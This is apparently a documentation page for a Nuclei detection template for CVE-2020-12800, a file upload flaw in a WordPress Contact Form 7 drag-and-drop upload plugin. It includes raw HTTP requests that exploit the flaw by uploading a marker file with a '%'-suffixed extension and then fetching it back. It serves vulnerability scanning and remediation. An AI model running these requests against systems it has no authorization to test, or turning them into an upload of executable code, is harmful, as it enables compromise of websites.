Skip to content
Nuclei Templates

WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution

ID: CVE-2020-12800

Severity: critical

Author: dwisiswant0

Tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz

Description

Section titled “Description”

WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.

YAML Source

Section titled “YAML Source”
id: CVE-2020-12800


info:
  name: WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site.
  remediation: |
    Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12800
    - https://github.com/amartinsec/CVE-2020-12800
    - https://packetstormsecurity.com/files/157951/WordPress-Drag-And-Drop-Multi-File-Uploader-Remote-Code-Execution.html
    - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12800
    cwe-id: CWE-434
    epss-score: 0.97465
    epss-percentile: 0.99957
    cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: codedropz
    product: drag_and_drop_multiple_file_upload_-_contact_form_7
    framework: wordpress
  tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz


http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601
        X-Requested-With: XMLHttpRequest


        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="supported_type"


        txt%
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="size_limit"


        5242880
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="action"


        dnd_codedropz_upload
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="type"


        click
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%"
        Content-Type: application/x-httpd-php


        CVE-2020-12800-{{randstr}}
        -----------------------------350278735926454076983690555601--
      - |
        GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2020-12800-{{randstr}}"


      - type: status
        status:
          - 200
# digest: 490a00463044022019f6b054490f762f4cddaf48cfc5116d9b1acf70c01422d944a40e390b3b8b4d02203fd10d73fb7ea3044412f3feb5583049b7651e7833cd2ec557583c6081bf76c6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-12800.yaml"

View on Github